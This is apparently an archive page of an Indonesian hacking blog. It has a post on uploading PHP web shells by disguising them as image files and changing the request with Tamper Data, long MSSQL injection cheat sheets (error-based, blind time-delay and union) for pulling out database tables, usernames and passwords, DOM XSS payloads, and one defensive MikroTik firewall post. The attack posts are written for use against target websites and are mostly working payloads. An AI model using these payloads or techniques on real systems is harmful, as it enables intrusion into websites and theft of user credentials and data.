Andi Wijaya

Upload shell php dengan Tamper Data

07 Jan 2012 Leave a Comment

by Andi Wijaya in hacking Tags: web shell, webshell

Mungkin banyak dari kita yang sudah tau apa itu webshell ? WebShell (PHP Shell), itu sebuah aplikasi berbasis php, yg dipake user untuk berinteraksi dengan server sistem. Kalo web shell, shell yg ditulis dalam bahasa pemrograman web (seperti R57, C99, dsb) untuk memudahkan eksplorasi terhadap suatu web yg memliki bug.

Untuk mengupload PHP Shell ini kita biasanya mencari fasilitas upload file.php , nah yang jadi pertanyaan kalau fasilitasnya hanya untuk upload file.jpg gimana ? Nah itu yang akan saya sharing tekhniknya. Tahap-tahapnya seperti berikut ini. Tapi dengan catatan anda telah menguasai website target dengan tekhnik : sql injection , LFI / RFI , atau exploit

1. Siapakan dulu file shell.php seperti : C99Shell, r57, atau b374k
2. Rename dengan nama : shell.php.jpg
3. Install add ons Tamper Data dulu di browser mozilla kita
4. Restart dan kita mulai upload
5. Cari fasilitas uploads gambar pada website target, kemudian tamper data kita jalankan

6. Trus Uploads shell.php.jpg kita dan tamper

7. Setelah langsung jalankan tamper datanya, tunggu pop out dari tamper data muncul , cari file shell.php.jpg dan rename path shell.php.jpg menjadi shell.php ! ingat yah

Sekarang anda tinggal cari dimana file shell anda berada .
Dan buka path shell.php anda di url browser dan siap meluncur ke TKP. Tapi inget, gak semua web target bisa kita lakukan dengan tekhnik ini .Kalau gak berhasil , silahkan hubungi adminnya aja langsung

Mengatasi serangan NetCut, Mac Cloning, Conficker dan Spam menggunakan Mikrotik RouterOS

02 Jan 2012 Leave a Comment

by Andi Wijaya in Mikrotik

Ok, langsung saja.. Kali ini saya akan memberikan tips and trik racikan konfigurasi firewall mikrotik routerOS untuk menangani beberapa masalah yang sering terjadi pada jaringan Hotspot seperti RT RW net. Beberapa serangan yang sering digunakan para attacker/ hacker untuk bisa mendapatkan koneksi internet secara gratis ataupun serangan virus, spam & DDOS yang dapat merusak lalu lintas data akan sangat membuat para admin jaringan merasa lelah untuk menanganinya… hahaha…

Oke, untuk mempersingkat waktu, langsung saja gunakan perintah-perintah berikut di terminal mikrotik kamu!

/ip firewall filter add action=accept chain=input comment=”default configuration (anti netcut, defaultnya accept)” disabled=no protocol=icmp

anti confliker
/ ip firewall filter
add chain=forward protocol=udp src-port=135-139 action=drop comment=”;;Block W32.Kido – Conficker” disabled=no
add chain=forward protocol=udp dst-port=135-139 action=drop comment=”” disabled=no
add chain=forward protocol=udp src-port=445 action=drop comment=”” disabled=no
add chain=forward protocol=udp dst-port=445 action=drop comment=”” disabled=no
add chain=forward protocol=tcp src-port=135-139 action=drop comment=”” disabled=no
add chain=forward protocol=tcp dst-port=135-139 action=drop comment=”” disabled=no
add chain=forward protocol=tcp src-port=445 action=drop comment=”” disabled=no
add chain=forward protocol=tcp dst-port=445 action=drop comment=”” disabled=no
add chain=forward protocol=tcp dst-port=4691 action=drop comment=”” disabled=no
add chain=forward protocol=tcp dst-port=5933 action=drop comment=”” disabled=no
add chain=forward protocol=udp dst-port=5355 action=drop comment=”Block LLMNR” disabled=no
add chain=forward protocol=udp dst-port=4647 action=drop comment=”” disabled=no
add action=drop chain=forward comment=”SMTP Deny” disabled=no protocol=tcp src-port=25
add action=drop chain=forward comment=”” disabled=no dst-port=25 protocol=tcp

BLOX SPAM

/ip firewall filter add chain=forward dst-port=135-139 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=135-139 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=445 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=445 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=593 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=4444 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=5554 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=9996 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=995-999 protocol=udp action=drop
/ip firewall filter add chain=forward dst-port=53 protocol=tcp action=drop
/ip firewall filter add chain=forward dst-port=55 protocol=tcp action=drop

ANTI NETCUT
/ip firewall filter
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=61.213.183.1-61.213.183.254
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=67.195.134.1-67.195.134.254
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=68.142.233.1-68.142.233.254
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=68.180.217.1-68.180.217.254
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=203.84.204.1-203.84.204.254
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=69.63.176.1-69.63.176.254
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=69.63.181.1-69.63.181.254
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=63.245.209.1-63.245.209.254
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=63.245.213.1-63.245.213.254
add action=accept chain=input comment=”ANTI NETCUT” disabled=no dst-port=\ 0-65535 protocol=tcp src-address=173.203.196.1-173.203.196.254

ANTI PORT SCAN
/ip firewall filter
add chain=input protocol=tcp psd=21,3s,3,1 action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”Port scanners to list ” disabled=no
add chain=input protocol=tcp tcp-flags=fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”NMAP FIN Stealth scan”
add chain=input protocol=tcp tcp-flags=fin,syn action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”SYN/FIN scan”
add chain=input protocol=tcp tcp-flags=syn,rst action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”SYN/RST scan”
add chain=input protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”FIN/PSH/URG scan”
add chain=input protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”ALL/ALL scan”
add chain=input protocol=tcp tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg action=add-src-to-address-list address-list=”port scanners” address-list-timeout=2w comment=”NMAP NULL scan”
add chain=input src-address-list=”port scanners” action=drop comment=”dropping port scanners” disabled=no
===========================================

TAMBAHAN
Ingat, urutan dibawah harus tepat…tidak boleh tertukar-tukar…
/ ip firewall filter
add chain=input in-interface=ether1 protocol=tcp dst-port=21 src-address-list=ftp_blacklist action=drop

# accept 10 incorrect logins per minute
/ ip firewall filter
add chain=output action=accept protocol=tcp content=”530 Login incorrect” dst-limit=1/1m,9,dst-address/1m

#add to blacklist
/ ip firewall filter
add chain=output action=add-dst-to-address-list protocol=tcp content=”530 Login incorrect” address-list=ftp_blacklist address-list-timeout=3h
==================================================

Microsoft SQL Error Exploit

31 Dec 2011 Leave a Comment

by Andi Wijaya in SQL Injection

ERROR SQL INJECTION – DETECTION

Integer Injection:
http://[site]/page.asp?id=1 having 1=1–Column ‘[COLUMN NAME]‘ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

String Injection:
http://[site]/page.asp?id=x’ having 1=1–Column ‘[COLUMN NAME]‘ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.

ERROR SQL INJECTION – EXTRACT DATABASE USER
	http://[site]/page.asp?id=1 or 1=convert(int,(USER))–Syntax error converting the nvarchar value ‘[DB USER]‘ to a column of data type int.

ERROR SQL INJECTION – EXTRACT DATABASE NAME
	http://[site]/page.asp?id=1 or 1=convert(int,(DB_NAME))–Syntax error converting the nvarchar value ‘[DB NAME]‘ to a column of data type int.
ERROR SQL INJECTION – EXTRACT DATABASE VERSION
	http://[site]/page.asp?id=1 or 1=convert(int,(@@VERSION))–Syntax error converting the nvarchar value ‘[DB VERSION]‘ to a column of data type int.
ERROR SQL INJECTION – EXTRACT SERVER NAME
	http://[site]/page.asp?id=1 or 1=convert(int,(@@SERVERNAME))–Syntax error converting the nvarchar value ‘[SERVER NAME]‘ to a column of data type int.

ERROR SQL INJECTION – EXTRACT 1st DATABASE TABLE
	http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85)))–Syntax error converting the nvarchar value ‘[TABLE NAME 1]‘ to a column of data type int.

ERROR SQL INJECTION – EXTRACT 2nd DATABASE TABLE
	http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>’TABLE-NAME-1‘))–Syntax error converting the nvarchar value ‘[TABLE NAME 2]‘ to a column of data type int.

ERROR SQL INJECTION – EXTRACT 3rd DATABASE TABLE
	http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 name from sysobjects where xtype=char(85) and ,name>’TABLE-NAME-2‘))–Syntax error converting the nvarchar value ‘[TABLE NAME 3]‘ to a column of data type int.

ERROR SQL INJECTION – EXTRACT 1st TABLE COLUMN NAME
	http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name=’TABLE-NAME-1‘))–Syntax error converting the nvarchar value ‘[COLUMN NAME 1]‘ to a column of data type int.

ERROR SQL INJECTION – EXTRACT 2nd TABLE COLUMN NAME
	http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name=’TABLE-NAME-1‘ and column_name>’COLUMN-NAME-1‘))–Syntax error converting the nvarchar value ‘[COLUMN NAME 2]‘ to a column of data type int.

ERROR SQL INJECTION – EXTRACT 3rd TABLE COLUMN NAME
	http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 column_name from DBNAME.information_schema.columns where table_name=’TABLE-NAME-1‘ and column_name>’COLUMN-NAME-2‘))–Syntax error converting the nvarchar value ‘[COLUMN NAME 3]‘ to a column of data type int.

ERROR SQL INJECTION – EXTRACT 1st FIELD OF 1st ROW
	http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1))–Syntax error converting the nvarchar value ‘[FIELD 1 VALUE]‘ to a column of data type int.

ERROR SQL INJECTION – EXTRACT 2nd FIELD OF 1st ROW
	http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-2 from TABLE-NAME-1))–Syntax error converting the nvarchar value ‘[FIELD 2 VALUE]‘ to a column of data type int.

ERROR SQL INJECTION – EXTRACT 3nd FIELD OF 1st ROW
	http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-3 from TABLE-NAME-1))–Syntax error converting the nvarchar value ‘[FIELD 3 VALUE]‘ to a column of data type int.

ERROR SQL INJECTION – EXTRACT 1st FIELD OF 2nd ROW
	http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in (‘FIELD-1-VALUE‘) order by COLUMN-NAME-1 desc))–Syntax error converting the nvarchar value ‘[FIELD 1 VALUE OF 2ND ROW]‘ to a column of data type int.

ERROR SQL INJECTION – EXTRACT 1st FIELD OF 3nd ROW
	http://[site]/page.asp?id=1 or 1=convert(int,(select top 1 COLUMN-NAME-1 from TABLE-NAME-1 where COLUMN-NAME-1 NOT in (‘FIELD-2-VALUE‘) order by COLUMN-NAME-1 desc))–Syntax error converting the nvarchar value ‘[FIELD 1 VALUE OF 3RD ROW]‘ to a column of data type int.

Microsoft SQL Blind Exploit

31 Dec 2011 Leave a Comment

by Andi Wijaya in SQL Injection

BLIND SQL INJECTION – DETECTION
	Integer Injection: http://[site]/page.asp?id=1; WAITFOR DELAY ’00:00:10‘– (+10 seconds) String Injection: http://[site]/page.asp?id=x’; WAITFOR DELAY ‘00:00:10‘– (+10 seconds)

BLIND SQL INJECTION – EXTRACT DATABASE USER

3 - Total Characters
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY ‘00:00:10‘–
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY ‘00:00:10‘–
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)

D – 1st Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY ‘00:00:10‘–
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY ‘00:00:10‘–
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)

B - 2nd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)

O - 3rd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY ‘00:00:10‘–
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY ‘00:00:10‘–
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)Database User = DBO

BLIND SQL INJECTION – EXTRACT DATABASE NAME

http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=8) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=112) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=114) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=111) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=45) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),5,1)))=100) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),6,1)))=98) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),7,1)))=45) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),8,1)))=49) WAITFOR DELAY ‘00:00:10‘– (+10 seconds)Database Name = PRO-DB-1

BLIND SQL INJECTION – EXTRACT 1st DATABASE TABLE

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=’U’)=5) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY ’00:00:10′– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY ’00:00:10′– (+10 seconds)Table Name = USERS

BLIND SQL INJECTION – EXTRACT 2nd DATABASE TABLE

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS‘)=6) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS‘),1,1)))=111) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS‘),2,1)))=114) WAITFOR DELAY ’00:00:10′– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS‘),3,1)))=100) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS‘),4,1)))=101) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS‘),5,1)))=114) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’USERS‘),6,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Table Name = ORDERS

BLIND SQL INJECTION – EXTRACT 3rd DATABASE TABLE

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS‘)=9) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS‘),1,1)))=99) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS‘),2,1)))=117) WAITFOR DELAY ’00:00:10′– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS‘),3,1)))=115) WAITFOR DELAY ’00:00:10′– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS‘),4,1)))=116) WAITFOR DELAY ’00:00:10′– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS‘),5,1)))=111) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS‘),6,1)))=109) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS‘),7,1)))=101) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS‘),8,1)))=114) WAITFOR DELAY ’00:00:10′– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>’ORDERS‘),9,1)))=115) WAITFOR DELAY ’00:00:10′– (+10 seconds)Table Name = CUSTOMERS

BLIND SQL INJECTION – EXTRACT 1st TABLE COLUMN NAME

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘)=4) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘),1,1)))=117) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘),2,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘),3,1)))=101) WAITFOR DELAY ’00:00:10′– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘),4,1)))=114) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Column Name = USER

BLIND SQL INJECTION – EXTRACT 2nd TABLE COLUMN NAME

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>‘USER‘)=4) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>‘USER‘),1,1)))=112) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>‘USER‘),2,1)))=97) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>‘USER‘),3,1)))=115) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>’USER‘),4,1)))=115) WAITFOR DELAY ’00:00:10′– (+10 seconds)Column Name = PASS

BLIND SQL INJECTION – EXTRACT 3rd TABLE COLUMN NAME

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>,‘PASS‘)=2) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>‘PASS‘),1,1)))=105) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name=’USERS‘ and column_name>‘PASS‘),2,1)))=100) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Column Name = ID

BLIND SQL INJECTION – EXTRACT 1st FIELD OF 1st ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS)=5) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),1,1))=97) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),2,1))=100) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),3,1))=109) WAITFOR DELAY ’00:00:10′– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),4,1))=105) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),5,1))=110) WAITFOR DELAY ’00:00:10′– (+10 seconds)Field Data = ADMIN

BLIND SQL INJECTION – EXTRACT 2nd FIELD OF 1st ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 PASS from USERS)=3) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),1,1))=49) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),2,1))=50) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),3,1))=51) WAITFOR DELAY ’00:00:10′– (+10 seconds)Field Data = 123

BLIND SQL INJECTION – EXTRACT 3nd FIELD OF 1st ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 ID  from USERS)=3) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),1,1))=49) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),2,1))=48) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),3,1))=48) WAITFOR DELAY ’00:00:10′– (+10 seconds)Field Data = 100

BLIND SQL INJECTION – EXTRACT 1st FIELD OF 2nd ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in (‘ADMIN‘) order by USERS desc)=3) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘ADMIN‘) order by USER desc),1,1)))=106) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘ADMIN‘) order by USER desc),2,1)))=111) WAITFOR DELAY ’00:00:10′– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘ADMIN‘) order by USER desc),3,1)))=101) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Field Data = JOE

BLIND SQL INJECTION – EXTRACT 1st FIELD OF 3nd ROW

http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in (‘JOE‘) order by USERS desc)=3) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘JOE‘) order by USER desc),1,1)))=106) WAITFOR DELAY ’00:00:10′–  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘JOE‘) order by USER desc),2,1)))=105) WAITFOR DELAY ’00:00:10′– (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in (‘JOE‘) order by USER desc),3,1)))=109) WAITFOR DELAY ’00:00:10′–  (+10 seconds)Field Data = JIM

DOM Based Cross Site Scripting

31 Dec 2011 Leave a Comment

by Andi Wijaya in SQL Injection Tags: xss

DOM XSS Example 1:
http://evilsql.com/main/page5.php?<script>alert(‘XSS’)</script>

DOM XSS Example 2:
http://evilsql.com/main/page5.php?name=<script>alert(‘XSS’)</script>

DOM XSS Example 3:
http://evilsql.com/main/page5.php?#<script>alert(‘XSS’)</script>

DOM XSS Example 4:
http://nobody@evilsql.com/main/page5.php?<script>alert(‘XSS’)</script>

DOM Echo:

http://www.evilsql.com/main/page5.php

Microsoft SQL Union Exploit

31 Dec 2011 Leave a Comment

by Andi Wijaya in SQL Injection Tags: sql injection

UNION SQL INJECTION – DETECTION

Integer Injection:
http://[site]/page.asp?id=1 UNION SELECT ALL 1–All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2–

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3–

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

http://[site]/page.asp?id=1 UNION SELECT ALL 1,2,3,4–

NO ERROR

UNION SQL INJECTION – EXTRACT DATABASE USER
	http://[site]/page.asp?id=1 UNION SELECT ALL 1,USER,3,4–[DB USER]

UNION SQL INJECTION – EXTRACT DATABASE NAME
	http://[site]/page.asp?id=1 UNION SELECT ALL 1,DB_NAME,3,4–[DB NAME]
UNION SQL INJECTION – EXTRACT DATABASE VERSION
	http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@VERSION,3,4–[DB VERSION]
UNION SQL INJECTION – EXTRACT SERVER NAME
	http://[site]/page.asp?id=1 UNION SELECT ALL 1,@@SERVERNAME,3,4–[SERVER NAME]

UNION SQL INJECTION – EXTRACT DATABASE TABLES

http://[site]/page.asp?id=1 UNION SELECT ALL 1,name,3,4 from sysobjects where xtype=char(85)–[TABLE NAME 1]

UNION SQL INJECTION – EXTRACT TABLE COLUMN NAMES

